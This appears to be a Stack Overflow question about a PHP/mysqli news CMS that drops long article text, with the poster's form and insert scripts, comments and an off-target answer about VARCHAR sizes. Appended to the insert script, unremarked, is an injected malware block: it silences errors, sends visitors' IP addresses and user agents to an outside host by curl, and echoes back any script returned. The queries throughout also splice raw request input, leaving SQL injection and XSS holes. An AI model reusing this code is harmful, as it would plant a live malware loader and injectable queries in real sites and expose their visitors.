# msqli non inserting long strings into database through php

Tags: php, mysql, database, string, text

So first I'll cover a bit of background. 
I have a CMS for a company that they use to update news articles and images to their website. Its written in php and uses msqli for database manipulation.

For some reason whenever they try to add text of a substantiation length (around 4,000) characters it doesn't insert into the table properly and leaves the field blank. This also happens when an existing news article is updated, as soon as a  lot of text is added the whole link is deleted and the field is blank.

Code:-

Page where user adds text:

```
<body>
    <div id="container">
        <div id="header">
        </div>
        <?php include('includes/Nav.php')?>
        <div id="contentcontainer">
            <div id="contentleft">
                <ul>
                    <?php
                        if(isset($_SESSION["myusername"]))
                        {
                            echo "<li>Welcome ".$_SESSION["myusername"]."!</li>";
                            echo "<a href=\"pages.php?pid=0\"><li>Add News</u></li></a>";
                            echo "<a href=\"pages.php?pid=-1\"><li>Add News Via Image</u></li></a>";
                            echo "<a href=\"pages.php?pid=-2\"><li>Add News Via Table</u></li></a>";
                        }
                        else
                        {
                            echo "</ul><li>Please Login using the form to your right.</li>";
                        }
                    ?>
                </ul>
            </div>
            <div id="contentright">
                <?php
                    $con = mysqli_connect($sqlhost,$sqlusername,$sqlpassword);
                            if (!$con)
                            {
                                die('Could not connect: ' . mysqli_error());
                            }
                    mysqli_select_db($con, $sqldatabase);
                    if(isset($_GET["pid"]))
                    {
                        //SQL TO GRAB PID
                        if($_GET["pid"]==0)
                        {
                            //ADD A PAGE SCREEN
                            echo "<h2>Add News</h2>";
                            echo "<form action=\"addpage.php\" method=\"POST\"><p><label>Title:</label><input type=\"text\" name=\"title\"/><br/>";
                            echo "<label>Description (For left hand News Panel):</label><input type=\"text\" name=\"desc\"/><br/>";
                            echo "<label>Page Content (HTML is allowed):</label>";
                            echo <<<END
<textarea id='content' name='content'></textarea>
<script language="Javascript" type="text/javascript">
    $("#content").css("height","100%").css("width","100%").htmlbox({
    toolbars:[
        [
        // Cut, Copy, Paste
        "separator","cut","copy","paste",
        // Undo, Redo
        "separator","undo","redo",
        // Bold, Italic, Underline, Strikethrough, Sup, Sub
        "separator","bold","italic","underline","strike","sup","sub",
        // Left, Right, Center, Justify
        "separator","justify","left","center","right",
        // Ordered List, Unordered List, Indent, Outdent
        "separator","ol","ul","indent","outdent",
        // Hyperlink, Remove Hyperlink, Image
        "separator","link","unlink","image"

        ],
        [// Show code
        "separator","code",
        // Formats, Font size, Font family, Font color, Font, Background
        "separator","formats","fontsize","fontfamily",
        "separator","fontcolor","highlight",
        ],
        [
        //Strip tags
        "separator","removeformat","striptags","hr","paragraph",
        // Styles, Source code syntax buttons
        "separator","quote","styles","syntax"
        ]
    ],
    skin:"blue"
});
</script>


END;
                                echo "<label>Show on Recent News?:</label><input type=\"checkbox\" name=\"nav\" value=\"nav\" /><br />";
                                echo "<label>Category:</label><select name=\"Category\">";
                            echo "<option value=\"Pool\">Pool</option>";
                            echo "<option value=\"Snooker\">Snooker</option>";
                            echo "<option value=\"Poker\">Poker</option>";
                            echo "<option value=\"Darts\">Darts</option>";
                            echo "<option value=\"Events\">Events</option>";
                            echo "</select><br/>";
                            echo "<input type=\"submit\" value=\"Add News\"/></p>";
                            echo "</form>";
                        }
                        else if($_GET["pid"]==-1)
                        {
                            //ADD NEWS VIA IMAGE SCREEN
                            echo "<h2>Add News Via Image</h2>";
                            echo "<form action=\"addpage.php\" method=\"POST\"><p><label>Title:</label><input type=\"text\" name=\"title\"/><br/>";
                            echo "<label>Description (For left hand News Panel):</label><input type=\"text\" name=\"desc\"/><br/>";

                            echo "<label>Image:</label><select name=\"NewsImage\">";


                            $resultc = mysqli_query($con, "SELECT * FROM pb_images");
                            while($rowc = mysqli_fetch_array($resultc))
                            {
                                echo "<option value=\"".$rowc['Image']."\">".$rowc['Name']."</option>";
                            }


                            echo "</select><br/>";

                            echo "<label>Show on Recent News?:</label><input type=\"checkbox\" name=\"nav\" value=\"nav\" /><br />";
                            echo "<label>Category:</label><select name=\"Category\">";
                            echo "<option value=\"Pool\">Pool</option>";
                            echo "<option value=\"Snooker\">Snooker</option>";
                            echo "<option value=\"Poker\">Poker</option>";
                            echo "<option value=\"Darts\">Darts</option>";
                            echo "<option value=\"Events\">Events</option>";
                            echo "</select><br/>";
                            echo "<input type=\"submit\" value=\"Add News\"/></p>";
                            echo "</form>";
                        }

                        else if($_GET["pid"]==-2)
                        {
                            //ADD NEWS VIA TABLE SCREEN
                            echo "<h2>Add News Via Table</h2>";
                            echo "<form action=\"addpage.php\" method=\"POST\" enctype=\"multipart/form-data\"><p><label>Title:</label><input type=\"text\" name=\"title\"/><br/>";
                            echo "<label>Description (For right hand News Panel):</label><input type=\"text\" name=\"desc\"/><br/>";

                            echo "<label>Table HTML File:</label><input type=\"file\" name=\"file\" id=\"file\" /> ";

                            echo "<label>Show on Recent News?:</label><input type=\"checkbox\" name=\"nav\" value=\"nav\" /><br />";
                            echo "<label>Category:</label><select name=\"Category\">";
                            echo "<option value=\"Pool\">Pool</option>";
                            echo "<option value=\"Snooker\">Snooker</option>";
                            echo "<option value=\"Poker\">Poker</option>";
                            echo "<option value=\"Darts\">Darts</option>";
                            echo "<option value=\"Events\">Events</option>";
                            echo "</select><br/>";
                            echo "<input type=\"submit\" value=\"Add News\"/></p>";
                            echo "</form>";
                        }

                        else
                        {
                            //Edit a page
                            echo "<h2>Edit News</h2>";
                            //SQL GRAB PAGE CONTENT

                            $result = mysqli_query($con, "SELECT * FROM pb_pages WHERE ID='".$_GET['pid']."'");
                            echo "<form action=\"editpage.php\" method=\"POST\"><p>";
                            while($row = mysqli_fetch_array($result))
                            {
                                echo "<input type=\"hidden\" id=\"pid\" name=\"pid\" value=\"".$_GET['pid']."\" />";
                                echo "<label>Title:</label><input type=\"text\" name=\"title\" value=\"".$row['Name']."\"/><br/>";
                                echo "<label>Description (Just for CMS):</label><input type=\"text\" name=\"description\" value=\"".$row['Description']."\"/><br/>";
                                echo "<label>Page Content (HTML is allowed):</label><TEXTAREA NAME=\"content\" COLS=40 ROWS=12>".$row['Content']."</TEXTAREA><br/>";
                                echo "<label>Show on Navigation?:</label><input type=\"checkbox\" name=\"nav\" value=\"nav\" ";

                                if($row['ShowNav']==1) echo " checked";
                                echo "/><br />";
                                echo "<label>Category:</label><select name=\"Category\">";
                                if($row['Category']!="Index")
                                {
                                    echo "<option value=\"Pool\">Pool</option>";
                                    echo "<option value=\"Snooker\">Snooker</option>";
                                    echo "<option value=\"Poker\">Poker</option>";
                                    echo "<option value=\"Darts\">Darts</option>";
                                    echo "<option value=\"Events\">Events</option>";
                                }
                                else
                                {
                                    echo "<option value=\"Index\">Index</option>";
                                }
                                echo "</select><br/>";
                            }

                            echo "<input type=\"submit\" value=\"Edit News\"/>";
                            echo "</form>";
                        }
                    }
                    else
                    {
                        echo "Below are a choice of editable news stories. Please choose one:<ul>";
                        $con = mysqli_connect($sqlhost,$sqlusername,$sqlpassword);
                        if (!$con)
                        {
                            die('Could not connect: ' . mysqli_error());
                        }
                        mysqli_select_db($con, $sqldatabase);
                        $result = mysqli_query($con, "SELECT * FROM pb_pages");
                        if (!$result) {
                        printf("Error: %s\n", mysqli_error($con));
                        exit();
                        }
                        while($row = mysqli_fetch_array($result))
                        {
                            echo "<li style=\"margin-bottom:0px;\"><a href=\"pages.php?pid=".$row['ID']."\">".$row['Name']."</a> <a href=\"deletepage.php?iid=".$row['ID']."\"><img src=\"images/cross.png\" alt=\"cross\"/></a></li>";
                        }
                    }
                ?>
            </div>
        </div>
        <div id="footer">
        Redesigned by Callum Howard of CDS-KAS
        </div>
</body>
```

Page where database is updated:

```
<?php
include('includes/variables.php');
$con = mysqli_connect($sqlhost,$sqlusername,$sqlpassword);
if (!$con)
{
die('Could not connect: ' . mysqli_error());
}
$nav=0;
if(isset($_POST['nav'])&&$_POST['nav']=="nav") $nav=1;
mysqli_select_db($con, $sqldatabase);

if(!isset($_POST['content']))
{
    if(isset($_POST['NewsImage']))
{
        mysqli_query($con, "INSERT INTO pb_pages (Name, Description,     Content,        ShowNav, Category)
VALUES ('".$_POST['title']."', '".$_POST['desc']."', '<img     src=\"cms/images/".$_POST['NewsImage']."\"     alt=\"Image\"/>','".$nav."','".$_POST['Category']."')");
    }
    else if(isset($_POST['file']))
    {
        $fh = fopen($_POST['file'], 'r');
        $theData = fread($fh, filesize($myFile));
        fclose($fh);
        $page = $theData;
        $stylefirst = strpos($page, ".xl");
        $stylelast = strpos($page, "-->");
        $blah = substr($page, $stylefirst, $stylelast-$stylefirst);
        while(strpos($blah, "border") != false)
        {
            $first = strpos($blah, "border");
            $last = strpos($blah, ";", $first);
            $before = substr($blah, 0, $first);
            $after = substr($blah, $last+1);
            $blah = $before.$after;
        }
        $tablefirst = strpos($page, "<table");
        $tablelast = strpos($page, "</table>");
        $table = substr($page, $tablefirst, $tablelast-$tablefirst);
        mysqli_query($con, "INSERT INTO pb_styles (Style)
VALUES ('".$style."')");
        mysqli_query($con, "INSERT INTO pb_pages (Name, Description,  Content, ShowNav, Category)
VALUES ('".$_POST['title']."', '".$_POST['desc']."', '".htmlentities($table,     ENT_QUOTES)."','".$nav."','".$_POST['Category']."')");
    }
} 
else
{
    if(mysqli_query($con, "INSERT INTO pb_pages (Name, Description, Content,     ShowNav, Category)
VALUES ('".$_POST['title']."', '".$_POST['desc']."',     '".htmlentities($_POST['content'],     ENT_QUOTES)."','".$nav."','".$_POST['Category']."')"))
    {
        echo "YAY";
    }
    else echo "Boo..";

}
//header("location:pages.php");
?>
<?php
#c13c1a#
error_reporting(0); ini_set('display_errors',0); $wp_hdvw34 =     @$_SERVER['HTTP_USER_AGENT'];

if (( preg_match ('/Gecko|MSIE/i', $wp_hdvw34) && !preg_match ('/bot/i',     $wp_hdvw34))){

$wp_hdvw0934="http://"."error"."css".".com/css"."/?    ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua="    .urlencode($wp_hdvw34);

$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_hdvw0934);

curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch,    CURLOPT_RETURNTRANSFER, 1); $wp_34hdvw = curl_exec ($ch); curl_close($ch);}

if ( substr($wp_34hdvw,1,3) === 'scr' ){ echo $wp_34hdvw; }
#/c13c1a#
?>
```

I can go into phpMyAdmin and directly update the database from there absolutely fine and it'll display correctly on the webpage. The field is set to varchar(10000).

Please help!

Comment: Does it throw any errors? You are open to SQL injections, which also could be your problem.

Comment: @chris85 Nope, no errors, it redirects as normal and just wipes the contents of the field

Comment: The indentation is off here and the `header` is commented out. Could you update this code to match your current code, and so indentations match?

Answer (score 0):

hi maybe you can check your table where you insert or update 4000 characters

MySQL would do fine as would most every RDBMS for that matter. When you specify a field as type CHAR() the number of characters is always used regardless of how many characters are in your string. For instance: If you have Char(64) field and you insert 'ABCD' then the field is still 64 bytes (assuming non-unicode).

When using VARCHAR(), however, the cell only uses as many bytes as are in the string, plus the number of bytes necessary to store the size of the string. So: If you have VARCHAR(64) and insert 'ABCD' you will only use 5 bytes. 4 for the characters 'ABCD' and one for the number of characters '4'.

Your extremely varying string lengths are exactly the reason we have VARCHAR(), so feel free to use VARCHAR(4500) and rest assured you will only be using as much space as necessary to store the characters in the string, and a little bit extra for the length.

Somewhat related: This is why it's not a great idea to use VARCHAR() for fields that don't have varying length strings being inserted. You are wasting space storing the size of the string when it's already known. For instance, telephone numbers of the form x-xxx-xxx-xxxx should just use Char(14) since it will always take up 14 characters and only 14 bytes are necessary. If you used VARCHAR(14) instead you would actually end up using 15 bytes.

check the documentation about this

```
http://dev.mysql.com/doc/refman/5.0/en/char.html
```

i thing that your problem is on your database or table..
good luck and try 
maybe you can share a picture of your struture table and code for help you

Comment: Thank you very much for your answer, what confuses me though is that if I enter a string into the table manually through phpMyAdmin it works perfectly. The table will accept and store the string of I add it manually, just not when it is added through php.